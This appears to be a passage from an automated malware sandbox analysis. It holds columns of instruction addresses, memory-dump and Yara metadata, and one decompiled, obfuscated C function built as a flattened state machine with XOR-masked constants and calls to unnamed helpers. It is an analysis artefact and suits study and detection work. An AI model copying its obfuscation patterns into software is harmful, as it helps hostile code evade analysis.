                                                      0x0023af69
                                                      0x0023af69
                                                      0x0023af6a
                                                      0x0023af94
                                                      0x0023af9b
                                                      0x0023afa0
                                                      0x0023afa3
                                                      0x0023afa8
                                                      0x0023afa9
                                                      0x0023afac
                                                      0x0023afaf
                                                      0x0023afaf
                                                      0x0023afaf
                                                      0x0023afb2
                                                      0x0023afbb
                                                      0x0023afbe
                                                      0x0023afc7
                                                      0x00000000
                                                      0x0023ae5a
                                                      0x0023ae5a
                                                      0x0023ae60
                                                      0x0023af41
                                                      0x0023af48
                                                      0x00000000
                                                      0x0023ae66
                                                      0x0023ae66
                                                      0x0023ae6c
                                                      0x0023af1a
                                                      0x0023af21
                                                      0x00000000
                                                      0x0023ae72
                                                      0x0023ae72
                                                      0x0023ae78
                                                      0x0023aef6
                                                      0x0023aefd
                                                      0x00000000
                                                      0x0023ae7a
                                                      0x0023ae7a
                                                      0x0023ae80
                                                      0x0023b02b
                                                      0x0023b02c
                                                      0x0023b033
                                                      0x0023b03a
                                                      0x00000000
                                                      0x0023ae86
                                                      0x0023ae86
                                                      0x0023ae8c
                                                      0x00000000
                                                      0x0023ae92
                                                      0x0023aeb5
                                                      0x0023aebd
                                                      0x0023aec2
                                                      0x0023aec7
                                                      0x0023aecf
                                                      0x00000000
                                                      0x0023aecf
                                                      0x0023ae8c
                                                      0x0023ae80
                                                      0x0023ae78
                                                      0x0023ae6c
                                                      0x0023ae60
                                                      0x0023ae54
                                                      0x00000000
                                                      0x0023ae48
                                                      0x0023aaa4
                                                      0x0023aaa1

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                                      • API String ID: 0-3061497230
                                                      • Opcode ID: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
                                                      • Instruction ID: 524ec21124ab27be4ae54ebcecb4891c3d8bfbad67950b5eaa8dd6e60b4fff16
                                                      • Opcode Fuzzy Hash: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
                                                      • Instruction Fuzzy Hash: 978224B151C3818BE378CF25C549B9BBBE2BBC4314F10891DE2DA86260DBB59959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023C769, Relevance: 24.4, Strings: 19, Instructions: 630COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E0023C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00235B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00248422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00247955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00237925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00237925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E0024889D(0x24c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E00231BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00242025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00246AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00238736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E0023F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00240F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E0023F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00235A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E0023F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00237925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E0024687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}



















































































































                                                      0x0023c777
                                                      0x0023c77c
                                                      0x0023c786
                                                      0x0023c78d
                                                      0x0023c794
                                                      0x0023c79b
                                                      0x0023c7a2
                                                      0x0023c7a9
                                                      0x0023c7aa
                                                      0x0023c7b1
                                                      0x0023c7b8
                                                      0x0023c7bf
                                                      0x0023c7c6
                                                      0x0023c7c7
                                                      0x0023c7c8
                                                      0x0023c7cd
                                                      0x0023c7da
                                                      0x0023c7e3
                                                      0x0023c7ea
                                                      0x0023c7ec
                                                      0x0023c7f3
                                                      0x0023c7f6
                                                      0x0023c7fe
                                                      0x0023c803
                                                      0x0023c808
                                                      0x0023c80d
                                                      0x0023c815
                                                      0x0023c820
                                                      0x0023c828
                                                      0x0023c830
                                                      0x0023c83b
                                                      0x0023c846
                                                      0x0023c851
                                                      0x0023c85c
                                                      0x0023c867
                                                      0x0023c872
                                                      0x0023c87d
                                                      0x0023c888
                                                      0x0023c893
                                                      0x0023c89e
                                                      0x0023c8a9
                                                      0x0023c8b4
                                                      0x0023c8bf
                                                      0x0023c8ca
                                                      0x0023c8d2
                                                      0x0023c8dd
                                                      0x0023c8e8
                                                      0x0023c8f0
                                                      0x0023c8fb
                                                      0x0023c906
                                                      0x0023c90e
                                                      0x0023c919
                                                      0x0023c921
                                                      0x0023c929
                                                      0x0023c92e
                                                      0x0023c936
                                                      0x0023c93e
                                                      0x0023c943
                                                      0x0023c94b
                                                      0x0023c950
                                                      0x0023c958
                                                      0x0023c963
                                                      0x0023c972
                                                      0x0023c976
                                                      0x0023c97d
                                                      0x0023c988
                                                      0x0023c993
                                                      0x0023c99b
                                                      0x0023c9a3
                                                      0x0023c9ae
                                                      0x0023c9b9
                                                      0x0023c9c4
                                                      0x0023c9da
                                                      0x0023c9df
                                                      0x0023c9e8
                                                      0x0023c9f3
                                                      0x0023ca05
                                                      0x0023ca0a
                                                      0x0023ca13
                                                      0x0023ca1e
                                                      0x0023ca26
                                                      0x0023ca33
                                                      0x0023ca36
                                                      0x0023ca3a
                                                      0x0023ca3f
                                                      0x0023ca47
                                                      0x0023ca5d
                                                      0x0023ca64
                                                      0x0023ca6f
                                                      0x0023ca77
                                                      0x0023ca7f
                                                      0x0023ca84
                                                      0x0023ca8c
                                                      0x0023ca98
                                                      0x0023ca9d
                                                      0x0023caa3
                                                      0x0023caab
                                                      0x0023cab3
                                                      0x0023cac6
                                                      0x0023cac9
                                                      0x0023cad0
                                                      0x0023cadb
                                                      0x0023caf1
                                                      0x0023caf8
                                                      0x0023cb03
                                                      0x0023cb0b
                                                      0x0023cb10
                                                      0x0023cb15
                                                      0x0023cb1a
                                                      0x0023cb22
                                                      0x0023cb2a
                                                      0x0023cb37
                                                      0x0023cb38
                                                      0x0023cb3c
                                                      0x0023cb44
                                                      0x0023cb4f
                                                      0x0023cb5a
                                                      0x0023cb65
                                                      0x0023cb6d
                                                      0x0023cb75
                                                      0x0023cb80
                                                      0x0023cb84
                                                      0x0023cb8c
                                                      0x0023cb94
                                                      0x0023cb99
                                                      0x0023cb9e
                                                      0x0023cba2
                                                      0x0023cbac
                                                      0x0023cbba
                                                      0x0023cbbd
                                                      0x0023cbc1
                                                      0x0023cbc9
                                                      0x0023cbce
                                                      0x0023cbd6
                                                      0x0023cbe1
                                                      0x0023cbec
                                                      0x0023cbf4
                                                      0x0023cbff
                                                      0x0023cc0a
                                                      0x0023cc15
                                                      0x0023cc20
                                                      0x0023cc2d
                                                      0x0023cc31
                                                      0x0023cc39
                                                      0x0023cc3e
                                                      0x0023cc46
                                                      0x0023cc51
                                                      0x0023cc5c
                                                      0x0023cc67
                                                      0x0023cc72
                                                      0x0023cc7d
                                                      0x0023cc88
                                                      0x0023cc90
                                                      0x0023cc98
                                                      0x0023cca0
                                                      0x0023cca8
                                                      0x0023ccb3
                                                      0x0023ccba
                                                      0x0023ccc5
                                                      0x0023ccd0
                                                      0x0023ccd8
                                                      0x0023ccdd
                                                      0x0023cce2
                                                      0x0023ccea
                                                      0x0023ccf5
                                                      0x0023cd00
                                                      0x0023cd0b
                                                      0x0023cd16
                                                      0x0023cd1e
                                                      0x0023cd23
                                                      0x0023cd2b
                                                      0x0023cd33
                                                      0x0023cd3e
                                                      0x0023cd49
                                                      0x0023cd54
                                                      0x0023cd5f
                                                      0x0023cd6a
                                                      0x0023cd72
                                                      0x0023cd7d
                                                      0x0023cd85
                                                      0x0023cd8d
                                                      0x0023cd95
                                                      0x0023cd9d
                                                      0x0023cda5
                                                      0x0023cdad
                                                      0x0023cdba
                                                      0x0023cdbe
                                                      0x0023cdc3
                                                      0x0023cdcb
                                                      0x0023cdd6
                                                      0x0023cde1
                                                      0x0023cdec
                                                      0x0023cdf7
                                                      0x0023ce02
                                                      0x0023ce0d
                                                      0x0023ce18
                                                      0x0023ce20
                                                      0x0023ce28
                                                      0x0023ce35
                                                      0x0023ce49
                                                      0x0023ce4e
                                                      0x0023ce57
                                                      0x0023ce5f
                                                      0x0023ce6a
                                                      0x0023ce72
                                                      0x0023ce77
                                                      0x0023ce7f
                                                      0x0023ce84
                                                      0x0023ce8c
                                                      0x0023ce97
                                                      0x0023cea2
                                                      0x0023cead
                                                      0x0023ceb5
                                                      0x0023cebd
                                                      0x0023cec5
                                                      0x0023cecd
                                                      0x0023ced5
                                                      0x0023cedd
                                                      0x0023cee5
                                                      0x0023ceea
                                                      0x0023ceef
                                                      0x0023cef7
                                                      0x0023ceff
                                                      0x0023cf0c
                                                      0x0023cf0d
                                                      0x0023cf11
                                                      0x0023cf19
                                                      0x0023cf24
                                                      0x0023cf2c
                                                      0x0023cf37
                                                      0x0023cf4a
                                                      0x0023cf51
                                                      0x0023cf5c
                                                      0x0023cf67
                                                      0x0023cf72
                                                      0x0023cf7a
                                                      0x0023cf85
                                                      0x0023cf98
                                                      0x0023cf9f
                                                      0x0023cfaa
                                                      0x0023cfb7
                                                      0x0023cfbb
                                                      0x0023cfc3
                                                      0x0023cfcb
                                                      0x0023cfd3
                                                      0x0023cfde
                                                      0x0023cfe9
                                                      0x0023cff4
                                                      0x0023cfff
                                                      0x0023d00a
                                                      0x0023d015
                                                      0x0023d020
                                                      0x0023d02b
                                                      0x0023d036
                                                      0x0023d041
                                                      0x0023d049
                                                      0x0023d04e
                                                      0x0023d056
                                                      0x0023d05e
                                                      0x0023d069
                                                      0x0023d074
                                                      0x0023d07c
                                                      0x0023d087
                                                      0x0023d095
                                                      0x0023d099
                                                      0x0023d0a1
                                                      0x0023d0a9
                                                      0x0023d0b1
                                                      0x0023d0bc
                                                      0x0023d0c7
                                                      0x0023d0d2
                                                      0x0023d0df
                                                      0x0023d0ea
                                                      0x0023d0f5
                                                      0x0023d100
                                                      0x0023d108
                                                      0x0023d113
                                                      0x0023d11e
                                                      0x0023d126
                                                      0x0023d132
                                                      0x0023d135
                                                      0x0023d13c
                                                      0x0023d147
                                                      0x0023d152
                                                      0x0023d15d
                                                      0x0023d165
                                                      0x0023d170
                                                      0x0023d186
                                                      0x0023d18d
                                                      0x0023d198
                                                      0x0023d1a0
                                                      0x0023d1a8
                                                      0x0023d1b5
                                                      0x0023d1b8
                                                      0x0023d1bc
                                                      0x0023d1c4
                                                      0x0023d1da
                                                      0x0023d1e8
                                                      0x0023d1eb
                                                      0x0023d1f2
                                                      0x0023d1f9
                                                      0x0023d208
                                                      0x0023d208
                                                      0x0023d208
                                                      0x0023d20d
                                                      0x0023d20d
                                                      0x0023d20f
                                                      0x0023d20f
                                                      0x0023d215
                                                      0x0023d215
                                                      0x0023d386
                                                      0x0023d388
                                                      0x0023d38f
                                                      0x0023d390
                                                      0x0023d29d
                                                      0x0023d29d
                                                      0x0023d2a1
                                                      0x0023d2a1
                                                      0x00000000
                                                      0x0023d2a1
                                                      0x0023d221
                                                      0x0023d31f
                                                      0x0023d321
                                                      0x0023d327
                                                      0x0023d327
                                                      0x0023d323
                                                      0x0023d323
                                                      0x0023d323
                                                      0x0023d329
                                                      0x0023d32b
                                                      0x0023d332
                                                      0x0023d332
                                                      0x0023d32d
                                                      0x0023d32d
                                                      0x0023d32d
                                                      0x0023d35b
                                                      0x0023d360
                                                      0x0023d365
                                                      0x0023d36d
                                                      0x00000000
                                                      0x0023d36d
                                                      0x0023d22d
                                                      0x0023d315
                                                      0x0023d20d
                                                      0x0023d20d
                                                      0x0023d20f
                                                      0x0023d20f
                                                      0x00000000
                                                      0x0023d20f
                                                      0x00000000
                                                      0x0023d20d
                                                      0x0023d23a
                                                      0x0023d2f8
                                                      0x0023d2fd
                                                      0x0023d300
                                                      0x0023d304
                                                      0x0023d310
                                                      0x00000000
                                                      0x0023d310
                                                      0x0023d242
                                                      0x0023d291
                                                      0x0023d296
                                                      0x0023d29b
                                                      0x00000000
                                                      0x0023d29c
                                                      0x0023d24a
                                                      0x0023d639
                                                      0x0023d639
                                                      0x0023d63f
                                                      0x0023d272
                                                      0x0023d27c
                                                      0x0023d27c
                                                      0x0023d645
                                                      0x00000000
                                                      0x0023d645
                                                      0x0023d269
                                                      0x00000000
                                                      0x0023d398
                                                      0x0023d398
                                                      0x0023d39e
                                                      0x0023d51a
                                                      0x0023d51c
                                                      0x0023d53c
                                                      0x0023d51e
                                                      0x0023d51e
                                                      0x0023d52b
                                                      0x0023d530
                                                      0x0023d533
                                                      0x0023d533
                                                      0x0023d5c9
                                                      0x0023d5d2
                                                      0x0023d5d9
                                                      0x0023d5de
                                                      0x0023d5e1
